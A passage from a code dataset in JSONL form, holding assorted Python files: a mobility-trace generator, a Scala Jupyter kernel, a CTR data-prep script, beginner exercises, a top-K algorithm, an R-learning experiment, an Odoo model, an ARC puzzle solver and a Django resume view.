top_left-10, 20, fill=\"white\")\n canvas.create_line(top_left, 0, top_left, 20, fill=\"white\")\n canvas.create_line(top_left, 20, top_left-10, 20, fill=\"white\")\n\n def terminate(self):\n self.root.destroy()\n","sub_path":"fun/MandelbrotViewer/progressbar.py","file_name":"progressbar.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"591719719","text":"import numpy as np\nimport 
matplotlib.pyplot as plt\n\n\nclass RandomWayPoint(object):\n def __init__(self, steps, x_range, y_range):\n np.random.seed()\n self.steps = steps\n self.pause_max = 5\n self.x_min = x_range[0]\n self.x_max = x_range[1]\n self.y_min = y_range[0]\n self.y_max = y_range[1]\n\n def generate_trace(self, start_coor):\n \"\"\"accord modified version of the RWP to generate trace data\"\"\"\n trace_data = []\n start_x = start_coor[0]\n start_y = start_coor[1]\n dest_x, dest_y = self._generate_dest_area()\n velo = self._generate_velo()\n step = self.steps\n while step > 0:\n part_trace, step_remain = self._generate_part_trace(start_x, start_y,\n dest_x, dest_y, velo, step_limit=step)\n\n trace_data.extend(part_trace)\n if step_remain == 0:\n break\n step = step_remain\n pause_t = self._generate_pause(step)\n last_coor = trace_data[-1]\n for p in range(pause_t):\n trace_data.append(last_coor)\n step -= pause_t\n start_x = trace_data[-1][0]\n start_y = trace_data[-1][1]\n dest_x, dest_y = self._generate_dest_area()\n velo = self._generate_velo()\n return np.array(trace_data)\n\n def _generate_part_trace(self, start_x, start_y, dest_x, dest_y, velo, step_limit):\n \"\"\"accord modified version of the RWP to generate the part trace data\"\"\"\n part_trace = []\n\n step_remain = step_limit\n next_x, next_y = start_x, start_y\n angle = np.arctan2(dest_y - start_y, dest_x - start_x)\n step_x = velo * np.cos(angle)\n step_y = velo * np.sin(angle)\n\n for step in range(step_limit, 0, -1):\n step_remain -= 1\n if np.abs(next_x - dest_x) < np.abs(step_x):\n next_x = dest_x\n next_y = dest_y\n part_trace.append(np.array([next_x, next_y]))\n break\n else:\n next_x += step_x\n next_y += step_y\n part_trace.append(np.array([next_x, next_y]))\n return part_trace, step_remain\n\n def _generate_dest_area(self):\n \"\"\"generate a random dest area locating in limited area\"\"\"\n pro = np.random.rand()\n if pro > 0.35:\n dest_x = np.random.uniform(self.x_min, self.x_max)\n dest_y = np.random.uniform(self.y_min, self.y_max)\n elif 0.15 < pro <= 0.35:\n dest_x = int(np.random.uniform(self.x_min, self.x_max)) + 0.01\n dest_y = int(np.random.uniform(self.y_min, self.y_max)) + 0.01\n else:\n type = np.random.randint(0, 4)\n if type == 0:\n dest_x = np.random.uniform(self.x_min, self.x_max)\n dest_y = self.y_min + 0.01\n elif type == 1:\n dest_x = self.x_max - 0.01\n dest_y = np.random.uniform(self.y_min, self.y_max)\n elif type == 2:\n dest_x = np.random.uniform(self.x_min, self.x_max)\n dest_y = self.y_max - 0.01\n else:\n dest_x = self.x_min + 0.01\n dest_y = np.random.uniform(self.y_min, self.y_max)\n return dest_x, dest_y\n\n def _generate_pause(self, p_max):\n \"\"\"generate a pause time\"\"\"\n pause = np.random.randint(0, min(p_max, self.pause_max))\n return pause\n\n def _generate_velo(self):\n \"\"\"generate random velocity between v_min and v_max\"\"\"\n velo = np.random.uniform(0.3, 1.3) # every step cannot exceed a certain number\n return velo\n\n def _get_epsilon(self):\n return np.random.uniform(-0.1, 0.1)\n\n\ndef test_model():\n x_range = np.array([0, 11])\n y_range = np.array([0, 11])\n model = RandomWayPoint(steps=500, x_range=x_range, y_range=y_range)\n trace_data = model.generate_trace(start_coor=[1, 1])\n # draw generated trace data\n plt.ion()\n plt.show()\n plt.figure(0)\n plt.plot(trace_data[:, 0], trace_data[:, 1], 'r')\n plt.draw()\n plt.pause(10)\n\n\nif __name__ == '__main__':\n 
test_model()\n","sub_path":"RandomWayPoint.py","file_name":"RandomWayPoint.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"452136665","text":"from __future__ import absolute_import, print_function, division\n\nimport asyncio\nimport os\nimport pathlib\nimport shutil\nimport sys\nimport atexit\nfrom tempfile import mkdtemp\nfrom metakernel import MetaKernel\nfrom metakernel.process_metakernel import TextOutput\n\nfrom tornado import gen\nfrom tornado import ioloop\n\nfrom spylon_kernel._scala_interpreter import ScalaException\nfrom .init_spark_magic import InitSparkMagic\nfrom .scala_magic import ScalaMagic\n\n\nclass SpylonKernel(MetaKernel):\n implementation = 'spylon-kernel'\n implementation_version = '1.0'\n language = 'scala'\n language_version = '0.1'\n banner = \"spylon-kernel - evaluates Scala statements and expressions.\"\n language_info = {\n 'mimetype': 'text/x-scala',\n 'name': 'scala',\n # ------ If different from 'language':\n 'codemirror_mode': \"text/x-scala\",\n 'pygments_lexer': 'scala',\n # 'version' : \"x.y.z\",\n 'file_extension': '.scala',\n 'help_links': MetaKernel.help_links,\n 'version': implementation_version,\n }\n kernel_json = {\n \"argv\": [\n sys.executable, \"-m\", \"spylon_kernel\", \"-f\", \"{connection_file}\"],\n \"display_name\": \"spylon-kernel\",\n \"env\": {\n \"SPARK_SUBMIT_OPTS\": \"-Dscala.usejavacp=true\",\n \"PYTHONUNBUFFERED\": \"1\",\n },\n \"language\": \"scala\",\n \"name\": \"spylon-kernel\"\n }\n\n def __init__(self, *args, **kwargs):\n super(SpylonKernel, self).__init__(*args, **kwargs)\n self.register_magics(ScalaMagic)\n self.register_magics(InitSparkMagic)\n\n tempdir = mkdtemp()\n atexit.register(shutil.rmtree, tempdir, True)\n self.tempdir = tempdir\n\n self._is_complete_ready = False\n self._scalamagic = self.line_magics['scala']\n assert isinstance(self._scalamagic, ScalaMagic)\n self._scalamagic._after_start_interpreter.append(self._initialize_pipes)\n self._scalamagic._after_start_interpreter.append(lambda: setattr(self, \"_is_complete_ready\", True))\n\n def __del__(self):\n shutil.rmtree(self.tempdir, ignore_errors=True)\n\n @property\n def pythonmagic(self):\n return self.line_magics['python']\n\n def get_usage(self):\n return \"This is spylon-kernel. 
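# A reproducibility note on the RandomWayPoint record above: its __init__ calls
# np.random.seed() with no argument, which reseeds from the OS, so traces differ
# on every run. A minimal hedged sketch of getting a repeatable trace (assumes the
# class above is importable as RandomWayPoint.RandomWayPoint; seed 42 is arbitrary):
import numpy as np
from RandomWayPoint import RandomWayPoint

model = RandomWayPoint(steps=100, x_range=np.array([0, 11]), y_range=np.array([0, 11]))
np.random.seed(42)  # seed *after* construction, because __init__ reseeds unconditionally
trace = model.generate_trace(start_coor=[1, 1])
assert trace.shape[1] == 2  # columns are x, y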
It implements a Scala interpreter.\"\n\n def set_variable(self, name, value):\n \"\"\"\n Set a variable in the kernel language.\n \"\"\"\n # python_magic = self.line_magics['python']\n # python_magic.env[name] = value\n\n def get_variable(self, name):\n \"\"\"\n Get a variable from the kernel language.\n \"\"\"\n # python_magic = self.line_magics['python']\n # return python_magic.env.get(name, None)\n\n async def execute_scala_async(self, code, future):\n intp = self._scalamagic._get_scala_interpreter()\n loop = asyncio.get_event_loop()\n try:\n result = await loop.run_in_executor(intp.executor, intp.interpret, code)\n self.log.debug(\"execute scala done\")\n future.set_result(result)\n except Exception as e:\n future.set_exception(e)\n return\n\n def do_execute_direct(self, code, silent=False):\n loop = asyncio.get_event_loop()\n try:\n fut = asyncio.Future()\n asyncio.ensure_future(self.execute_scala_async(code, fut))\n res = loop.run_until_complete(fut)\n if res:\n return TextOutput(res)\n except ScalaException as e:\n return self.Error(e.scala_message)\n\n def get_completions(self, info):\n magic = self.line_magics['scala']\n return magic.get_completions(info)\n\n def get_kernel_help_on(self, info, level=0, none_on_fail=False):\n magic = self.line_magics['scala']\n return magic.get_help_on(info, level, none_on_fail)\n\n def do_is_complete(self, code):\n \"\"\"\n Given code as string, returns dictionary with 'status' representing\n whether code is ready to evaluate. Possible values for status are:\n\n 'complete' - ready to evaluate\n 'incomplete' - not yet ready\n 'invalid' - invalid code\n 'unknown' - unknown; the default unless overridden\n\n Optionally, if 'status' is 'incomplete', you may indicate\n an indentation string.\n\n Example:\n\n return {'status' : 'incomplete',\n 'indent': ' ' * 4}\n \"\"\"\n if code.startswith(self.magic_prefixes['magic']) or not self._is_complete_ready:\n # force requirement to end with an empty line\n if code.endswith(\"\\n\"):\n return {'status': 'complete', 'indent': ''}\n else:\n return {'status': 'incomplete', 'indent': ''}\n # The scala interpreter can take a while to be alive, only use the fancy method when we dont need to lazily\n # instantiate the interpreter\n # otherwise, how to know is complete?\n magic = self.line_magics['scala']\n assert isinstance(magic, ScalaMagic)\n interp = magic._get_scala_interpreter()\n status = interp.is_complete(code)\n # TODO: Better indent\n return {'status': status, 'indent': ' ' * 4 if status == 'incomplete' else ''}\n\n def _initialize_pipes(self):\n STDOUT = os.path.abspath(os.path.join(self.tempdir, 'stdout'))\n STDERR = os.path.abspath(os.path.join(self.tempdir, 'stderr'))\n # Start up the pipes on the JVM side\n self.log.critical(\"STDOUT %s\", STDOUT)\n magic = self.line_magics['scala']\n\n self.log.critical(\"Before Java redirected\")\n code = 'Console.set{pipe}(new PrintStream(new FileOutputStream(new File(new java.net.URI(\"{filename}\")), true)))'\n code = '\\n'.join([\n 'import java.io.{PrintStream, FileOutputStream, File}',\n 'import scala.Console',\n code.format(pipe=\"Out\", filename=pathlib.Path(STDOUT).as_uri()),\n code.format(pipe=\"Err\", filename=pathlib.Path(STDERR).as_uri())\n ])\n o = magic.eval(code, raw=True)\n self.log.critical(\"Console redirected %s\", o)\n\n loop = asyncio.get_event_loop()\n loop.create_task(self._poll_file(STDOUT, self.Write))\n loop.create_task(self._poll_file(STDERR, self.Error))\n\n ioloop.IOLoop.current().spawn_callback(self._loop_alive)\n\n @gen.coroutine\n def 
_loop_alive(self):\n \"\"\"This is a little hack to ensure that during the tornado eventloop we also run one iteration of the asyncio\n eventloop.\n\n \"\"\"\n loop = asyncio.get_event_loop()\n while True:\n loop.call_soon(loop.stop)\n loop.run_forever()\n yield gen.sleep(0.01)\n\n async def _poll_file(self, filename, fn):\n \"\"\"\n\n Parameters\n ----------\n filename : str\n fn : (str) -> None\n Function to deal with string output.\n \"\"\"\n fd = open(filename, 'r')\n while True:\n line = fd.readline()\n if line:\n self.log.critical(\"READ LINE from %s, %s\", filename, line)\n fn(line)\n self.log.critical(\"AFTER PUSH\")\n await asyncio.sleep(0)\n else:\n await asyncio.sleep(0.01)\n\n# TODO: Comm api style thing. Basically we just need a server listening on a port that we can push stuff to.\n\n# localhost:PORT/output\n# {\n# \"output_id\": \"string\",\n# \"mimetype\": \"plain\",\n# \"data\": object()\n# }\n","sub_path":"spylon_kernel/scala_kernel.py","file_name":"scala_kernel.py","file_ext":"py","file_size_in_byte":7520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"352656000","text":"# -*- coding: utf-8 -*-\r\nimport pandas as pd\r\nimport os\r\nimport numpy as np\r\n\r\ndatapath = \"./preliminary_contest_data/\"\r\n\r\nad_features_df = pd.read_csv(os.path.join(datapath, \"adFeature.csv\"))\r\nprint(\"ad_features_df shape\", ad_features_df.shape)\r\nuser_features = []\r\nwith open(os.path.join(datapath, \"userFeature.data\"), 'r') as fid:\r\n for line in fid:\r\n feature_dict = dict()\r\n fields = line.strip('\\n').split('|')\r\n for field in fields:\r\n splits = field.split(' ')\r\n feature_name = splits[0]\r\n feature_value = ' '.join(splits[1:])\r\n feature_dict[feature_name] = feature_value\r\n user_features.append(feature_dict)\r\nuser_features_df = pd.DataFrame(user_features)\r\nuser_features_df['uid'] = user_features_df['uid'].map(lambda x: int(x))\r\nprint(\"user_features_df shape\", user_features_df.shape)\r\n\r\ntrain_df = pd.read_csv(os.path.join(datapath, \"train.csv\"))\r\nprint(\"train_df shape\", train_df.shape)\r\n\r\ntrain_with_ad = pd.merge(train_df, right=ad_features_df, on=\"aid\", how=\"left\")\r\ntrain_with_ad_user = pd.merge(train_with_ad, right=user_features_df, on=\"uid\", how=\"left\")\r\ntrain_with_ad_user = train_with_ad_user.reindex(columns=[\"label\",\"aid\",\"uid\",\"advertiserId\",\"campaignId\",\"creativeId\",\"creativeSize\",\"adCategoryId\",\"productId\",\"productType\",\"age\",\"gender\",\"marriageStatus\",\"education\",\"consumptionAbility\",\"LBS\",\"ct\",\"os\",\"carrier\",\"appIdInstall\",\"appIdAction\",\"house\",\"topic1\",\"topic2\",\"topic3\",\"interest1\",\"interest2\",\"interest3\",\"interest4\",\"interest5\",\"kw1\",\"kw2\",\"kw3\"])\r\ntrain_with_ad_user['label'] = train_with_ad_user['label'].map(lambda x: 1 if float(x) > 0 else 0)\r\ntrain_with_ad_user.to_csv(\"train.csv\", index=False)\r\nprint(\"train_with_ad_user shape\", train_with_ad_user.shape)\r\n\r\n\r\ntest_df = pd.read_csv(os.path.join(datapath, \"test1_truth.csv\"), header=None, names=['aid', 'uid', 'label'])\r\nprint(\"test_df shape\", test_df.shape)\r\ntest_with_ad = pd.merge(test_df, right=ad_features_df, on=\"aid\", how=\"left\")\r\ntest_with_ad_user = pd.merge(test_with_ad, right=user_features_df, on=\"uid\", how=\"left\")\r\ntest_with_ad_user = 
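# The _loop_alive coroutine in the spylon kernel above pumps the asyncio loop from
# inside Tornado by scheduling loop.stop() and then calling run_forever(), which
# executes exactly one batch of ready callbacks. A self-contained sketch of that
# "run one iteration" trick, independent of the kernel code:
import asyncio

def pump_once(loop):
    # run_forever() returns as soon as the stop() scheduled here is reached,
    # so every callback that is already ready gets one chance to run.
    loop.call_soon(loop.stop)
    loop.run_forever()

loop = asyncio.new_event_loop()
ran = []
loop.call_soon(lambda: ran.append(True))  # scheduled before stop(), so it runs first
pump_once(loop)
assert ran == [True]
loop.close()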
test_with_ad_user.reindex(columns=[\"label\",\"aid\",\"uid\",\"advertiserId\",\"campaignId\",\"creativeId\",\"creativeSize\",\"adCategoryId\",\"productId\",\"productType\",\"age\",\"gender\",\"marriageStatus\",\"education\",\"consumptionAbility\",\"LBS\",\"ct\",\"os\",\"carrier\",\"appIdInstall\",\"appIdAction\",\"house\",\"topic1\",\"topic2\",\"topic3\",\"interest1\",\"interest2\",\"interest3\",\"interest4\",\"interest5\",\"kw1\",\"kw2\",\"kw3\"])\r\ntest_with_ad_user['label'] = test_with_ad_user['label'].map(lambda x: 1 if float(x) > 0 else 0)\r\ntest_with_ad_user.to_csv(\"test.csv\", index=False)\r\nprint(\"test_with_ad_user shape\", test_with_ad_user.shape)\r\n\r\n\r\n","sub_path":"OpenCTR1119/data/scripts/split_taac18_dataset_x1x2.py","file_name":"split_taac18_dataset_x1x2.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"308111946","text":"# class Wife:\n# \"\"\"\n# Wife\n# \"\"\"\n# #1. Data members: name, age, sex\n# def __init__(self,name,age,sex):\n# self.name=name\n# self.age=age\n# self.sex=sex\n#\n# #2. Method members: cooking\n# def cooking(self):\n# print(\"cooking\")\n# # Create an object\n# # Calls __init__(self,name,age,sex)\n# w01=Wife()\n\n#(1) Student is a class, with data such as name and age,\n'''\n# and behaviours such as study and work.\nclass Student:\n \"\"\"\n Student\n \"\"\"\n def __init__(self,name,age):\n self.name = name\n self.age = age\n\n def study(self):\n print(self.name+\" studies, \"+str(self.age))\n\n def work(self):\n print(self.name+\" works, \"+str(self.age))\n\nw01=Student(\"Student Wukong\",28)\nw01.study()\nw01.work()\n\nw02=Student(\"Student Bajie\",29)\nw02.study()\nw02.work()\n'''\n\nclass Enemy:\n \"\"\"\n Enemy\n \"\"\"\n def __init__(self,name=\"\",hp=0,atk=0,atk_speed=0):\n self.name=name\n self.hp=hp\n self.atk=atk\n self.atk_speed=atk_speed\n\n def print_self(self):\n print(self.name,self.hp,self.atk,self.atk_speed)\n\n\n#1. Read 3 enemies from the console and store them in a list\nlist=[]\nfor i in range(3):\n e=Enemy()\n e.name=str(input(\"Enter the name of enemy %d: \"%(i+1)))\n e.hp = int(input(\"Enter the HP of enemy %d: \"%(i+1)))\n e.atk = float(input(\"Enter the attack of enemy %d: \"%(i+1)))\n e.atk_speed = float(input(\"Enter the attack speed of enemy %d: \"%(i+1)))\n list.append(e)\nfor item in list:\n item.print_self()\n\n\n# Exercise 3: define a function that finds an enemy object in the enemy list by name.\n# e01 = Enemy(\"zs\",100,10,2)\n# e02 = Enemy(\"ls\",200,5,3)\n# e03 = Enemy(\"ww\",300,8,5)\n#\n# list_enemy = [e01,e02,e03]\n\ndef get_enemy_for_name(list_enemy,name):\n # Walk the enemy list\n for item in list_enemy:\n # If an enemy object with the given name exists\n if item.name == name:\n # return that object\n return item\n\nlist01 = [\n Enemy(\"zs\",100,10,2),\n Enemy(\"ls\", 200, 5, 3),\n Enemy(\"ww\",300,8,5)\n]\n\nre = get_enemy_for_name(list01,\"ls\")\nif re != None:\n re.print_self()\nelse:\n print(\"Not found\")\n\n\n\n\n\n\n\n\n\n","sub_path":"Mr.左/month01/代码/day08/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"24056500","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server import util\n\n\nclass UploadDefinition(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, bytes: int=None, location: str=None): # noqa: E501\n \"\"\"UploadDefinition - a model defined in Swagger\n\n :param bytes: The bytes of this UploadDefinition. 
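# The dataset script above left-joins ad and user features onto the click log and
# then reindex()es to force a fixed column order; columns absent from the merge come
# back as NaN. A toy illustration of that pattern with made-up data:
import pandas as pd

log = pd.DataFrame({'aid': [1, 1, 2], 'uid': [10, 11, 10], 'label': [1, -1, -1]})
ads = pd.DataFrame({'aid': [1, 2], 'creativeSize': [50, 80]})
out = pd.merge(log, ads, on='aid', how='left')
out = out.reindex(columns=['label', 'aid', 'uid', 'creativeSize', 'missing_col'])
out['label'] = out['label'].map(lambda x: 1 if float(x) > 0 else 0)
print(out)  # 'missing_col' is all NaN, exactly like an absent feature upstream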
# noqa: E501\n :type bytes: int\n :param location: The location of this UploadDefinition. # noqa: E501\n :type location: str\n \"\"\"\n self.swagger_types = {\n 'bytes': int,\n 'location': str\n }\n\n self.attribute_map = {\n 'bytes': 'bytes',\n 'location': 'location'\n }\n self._bytes = bytes\n self._location = location\n\n @classmethod\n def from_dict(cls, dikt) -> 'UploadDefinition':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The UploadDefinition of this UploadDefinition. # noqa: E501\n :rtype: UploadDefinition\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def bytes(self) -> int:\n \"\"\"Gets the bytes of this UploadDefinition.\n\n\n :return: The bytes of this UploadDefinition.\n :rtype: int\n \"\"\"\n return self._bytes\n\n @bytes.setter\n def bytes(self, bytes: int):\n \"\"\"Sets the bytes of this UploadDefinition.\n\n\n :param bytes: The bytes of this UploadDefinition.\n :type bytes: int\n \"\"\"\n\n self._bytes = bytes\n\n @property\n def location(self) -> str:\n \"\"\"Gets the location of this UploadDefinition.\n\n\n :return: The location of this UploadDefinition.\n :rtype: str\n \"\"\"\n return self._location\n\n @location.setter\n def location(self, location: str):\n \"\"\"Sets the location of this UploadDefinition.\n\n\n :param location: The location of this UploadDefinition.\n :type location: str\n \"\"\"\n\n self._location = location\n","sub_path":"src/odin-http/swagger_server/models/upload_definition.py","file_name":"upload_definition.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"44326584","text":"import cv2\n\ndef main():\n\n windowName = \"Live video feed\"\n cv2.namedWindow(windowName)\n \n windowName1 = \"Live video feed 1\"\n cv2.namedWindow(windowName1)\n\n Regular = \"video feed\"\n cv2.namedWindow(Regular)\n \n Regular1 = \"video feed 1\"  # distinct name: \"video feed\" would collide with the window above\n cv2.namedWindow(Regular1)\n\n cap = cv2.VideoCapture(0)\n cap1 =cv2.VideoCapture(1)\n\t\n # video from the laptop webcam\n if cap.isOpened():\n ret,frame = cap.read()\n else:\n ret = False\n\n while ret:\n ret,frame= cap.read()\n output = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) \n cv2.imshow(Regular, frame) \n cv2.imshow(windowName,output)\n if cv2.waitKey(1)==27:\n break\n cv2.destroyWindow(windowName)\n cv2.destroyWindow(Regular)\n\n cap.release()\n\n\t# video from the external camera\n if cap1.isOpened():\n ret1,frame1 = cap1.read()\n else:\n ret1 = False\n\n while ret1:\n ret1,frame1= cap1.read()\n output1 = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY) \n cv2.imshow(Regular1, frame1)\n cv2.imshow(windowName1,output1) \n if cv2.waitKey(1)==27:\n break\n cv2.destroyWindow(windowName1)\n cv2.destroyWindow(Regular1)\n \n cap1.release()\n\nif __name__== \"__main__\":\n main() \n","sub_path":"Programs/19_ex3_CamGrayLive.py","file_name":"19_ex3_CamGrayLive.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"84745900","text":"# Final review, Sept. 27\n\n# Take the K largest numbers\n\n# Method 1: keep the first K numbers as a pool;\n# compare each of the remaining N-K numbers against the pool, and whenever one is larger,\n# swap it in for the smallest number currently in the pool.\n# This approach runs in O(N*K).\n\n# Method 2: use quicksort's partition function to land the split at position K;\n# the elements in front of the split are then the answer.\n# This is a very effective approach, with expected time O(N) (see Introduction to Algorithms for the proof).\n\n# Method 3: use heapsort.\n\ndef partition(array, left, right):\n pivot = array[right]\n i = left - 1\n for j in range(left, right):\n if array[j] >= pivot:  # '>=' partitions in descending order, so the prefix holds the largest values\n i += 1\n array[i], array[j] = array[j], array[i]\n array[i+1], array[right] = array[right], array[i+1]\n 
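# The two capture blocks in the camera script above are identical except for the
# camera index and the color conversion; a hedged refactor into one helper (the
# camera indices 0/1 and the window names are assumptions about the setup):
import cv2

def show_camera(index, conversion, window_raw, window_converted):
    cap = cv2.VideoCapture(index)
    ret = cap.isOpened()
    while ret:
        ret, frame = cap.read()
        if not ret:
            break
        cv2.imshow(window_raw, frame)
        cv2.imshow(window_converted, cv2.cvtColor(frame, conversion))
        if cv2.waitKey(1) == 27:  # Esc quits
            break
    cap.release()
    cv2.destroyWindow(window_raw)
    cv2.destroyWindow(window_converted)

# show_camera(0, cv2.COLOR_BGR2RGB, "video feed", "Live video feed")
# show_camera(1, cv2.COLOR_BGR2GRAY, "video feed 1", "Live video feed 1")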
return i+1\n\n\ndef topK(array, K):\n if len(array) < K:\n raise ValueError(\"array must hold at least K elements\")\n low = 0\n high = len(array) - 1\n j = partition(array, low, high)\n while j != K:\n # keep refining until the split lands exactly at K\n if K > j:\n # K lies in the part after the split\n low = j + 1\n else:\n # K lies in the part before the split\n high = j - 1\n j = partition(array, low, high)\n\n\nK = 4\ntest1 = [9, 8, 1, 2, 3, 5, 4, 6, 7]\ntopK(test1, K)\nprint(test1[:K])","sub_path":"topK_three_realizations.py","file_name":"topK_three_realizations.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"589381595","text":"\"\"\" R Learning application to the RiverSwim problem \n\nIn this script, we apply R Learning (Schwartz - 1993) to solve the average reward for the \nRiverSwim MDP.\n\nFrom the slides of Alessandro Lazaric, Exploration-Exploitation in Reinforcement Learning (Part1), \nand solving analytically the RiverSwim, we know that the gain value is 0.4286\n\nThis script requires that `numpy`, `matplotlib` and `pickle` be installed within the Python \nenvironment you are running this script in.\n\n\"\"\"\n\nimport os\nimport numpy as np\nimport random\nfrom tqdm import tqdm\nfrom mdp_riverswim import RiverSwim_Split\nimport matplotlib.pyplot as plt\n\ndef r_learning(env, alpha=0.01, beta=0.01, max_steps=50):\n \"\"\" R Learning algorithm (Schwartz - 1993) to solve the average reward problem\n\n Args:\n env - the object of the environment. In this case, the RiverSwim object.\n alpha - learning rate to update the Q-values\n beta - learning rate to update the gain, rho\n max_steps = maximum number of steps for r-learning\n \n Returns:\n rho - array with all rho values given by r-learning\n values - array of all values for the recurrent state, during all iterations of r-learning\n \"\"\"\n\n env.state_values, env.state_q_values = env.init_values()\n rho = 0.0\n epsilon=0.3\n \n rhos = []\n ves = []\n\n for t in tqdm(range(max_steps)):\n\n # every 20 steps we reset the initial state\n if(t%20==0):\n state = random.choice(env.states)\n\n # for 1000 steps, save rho and v(sI)\n if(t%1000==0):\n rhos.append(rho)\n ves.append(env.state_values[sI])\n # print(f't={t}, p={rho}, v_s0={env.state_values[sI]}')\n \n # get action for current state\n action = env.getAction(state, epsilon, t)\n\n # apply action, get new state and reward\n new_state, reward = env.step(state, action)\n\n # update Q-values and the policy\n sample = (reward - rho) + np.max(env.state_q_values[new_state]) \n env.state_q_values[state][action] = (1-alpha)*env.state_q_values[state][action] + alpha*sample\n env.state_q_values[0,:] = 0.0\n env.policy[state] = np.argmax(env.state_q_values[state])\n env.state_values[state] = np.max(env.state_q_values[state])\n \n # update rho\n rho = rho + beta*(reward - rho + np.max(env.state_q_values[new_state]) -\n np.max(env.state_q_values[state]))\n \n if(new_state==0):\n state = random.choice(env.states[1:]) \n else:\n state = new_state\n\n return rhos, ves\n\n# ------------------------------------------------------------------------------\n\n# recurrent state for RiverSwim (state 1)\nsI = 1\n# max number of steps for R Learning\nsteps = 4000e3 \n# learning rate to update the Q-values\nalpha = 0.0001\n# learning rate to update the gain, rho\nbeta = 0.000001\n# path to save data\npath = './results_rlearning/'\nif not os.path.exists(path):\n os.makedirs(path)\n\n# Create the environment\nenv = RiverSwim_Split(sI)\n# Solve by R Learning\nrhos, ves = r_learning(env, alpha=alpha, beta=beta, max_steps=int(steps))\n\n# 
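# A small self-check for the partition-based top-K above, comparing against
# heapq.nlargest (assumes the topK/partition functions above are in scope; the
# order inside the prefix is not guaranteed, so compare as sorted multisets):
import heapq
import random

data = [random.randrange(100) for _ in range(50)]
expected = sorted(heapq.nlargest(4, data))
arr = list(data)
topK(arr, 4)
assert sorted(arr[:4]) == expected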
save records for rho and value of sI\nnp.save(path+'rhos.npy',rhos)\nnp.save(path+'values_sI.npy',ves)\n","sub_path":"RiverSwim/rlearning.py","file_name":"rlearning.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"483253509","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime, timedelta\nfrom odoo import api, fields, models\n\n\nclass ProductTemplate(models.Model):\n _inherit = \"product.template\"\n\n product_image_360_ids = fields.One2many('product.image.360', 'product_tmpl_id', string='Images')\n display_360_image = fields.Boolean(string='Display 360 Image')\n\nclass ProductImage360(models.Model):\n _name = 'product.image.360'\n _order = 'sequance'\n\n name = fields.Char(string='Name')\n image = fields.Binary(string='Image', attachment=True)\n product_tmpl_id = fields.Many2one('product.template', string='Related Product', copy=True)\n sequance = fields.Integer(string=\"Sequance\")\n","sub_path":"models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"449381661","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 18 13:43:04 2019\n\n@author: Ajinkya Sakhare\n\"\"\"\nimport numpy as np\nimport solver_utils\n\ndef solve(inputmatrix):\n \"\"\"\n This function contains a solution to the data in 4be741c5.json posed by the Abstraction and\n Reasoning Corpus (ARC).\n\n The problem presents an n x m grid, with some rows containing 0-m coloured squares with repetition over a row or colomuns.\n The solution requires the rows to be ordered such that it get color of all unique colors if it is either row-wise or colomun-wise.\n \"\"\"\n #Empty result list to return results\n result=[]\n #convert input to numpy array\n\n y = np.array([np.array(xi) for xi in inputmatrix])\n\n if len(np.unique(y[:1][0]))>1:#if the count of unique colors is more than one\n\n indexes = np.unique(y[:1][0], return_index=True)[1] #Get the indexes of unique colour\n row=[y[:1][0][index] for index in sorted(indexes)]#Get the unique colors in unsorted list\n result.append(row)#append row to result\n\n else:#if colour are in colomun\n indexes = np.unique(y[:, 0], return_index=True)[1]#Get the indexes of unique colour\n colomun = [y[:, 0][index] for index in sorted(indexes)]#Get the unique colors in unsorted list\n for value in colomun:\n result.append([value])#Appending values to the result\n return (result)\n\nif __name__ == \"__main__\":\n data = solver_utils.parse_json_file()\n\n for training in data['train']:\n solver_utils.solve_wrapper(training['input'], solve)\n\n for testing in data['test']:\n solver_utils.solve_wrapper(testing['input'], solve)\n","sub_path":"src/solution_4be741c5.py","file_name":"solution_4be741c5.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"369415101","text":"from django.shortcuts import render\nfrom resume.models import *\n\nsummary=\"\"\"\nI'm a fresh graduate with bachelor degree in computer science.\nI'm a self-taught python programmer.\nI'm interested in learning new things and increasing my knowledge relevant to python\nprogramming language and other information technology.\n\"\"\"\ntitle='Resume'\nname='Herry Wijaya'\noccupation='Full Stack Web Developer'\naddress='Bogorpark Residence Blok D27 Pamoyanan, Bogor, Jawa 
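# The R-learning script's docstring states the analytic gain of RiverSwim is about
# 0.4286; a hedged post-hoc check on the trace it saves (the tail length of 100 and
# the default save path are assumptions):
import numpy as np

rhos = np.load('./results_rlearning/rhos.npy')
tail = rhos[-100:].mean()  # average of the last recorded gain estimates
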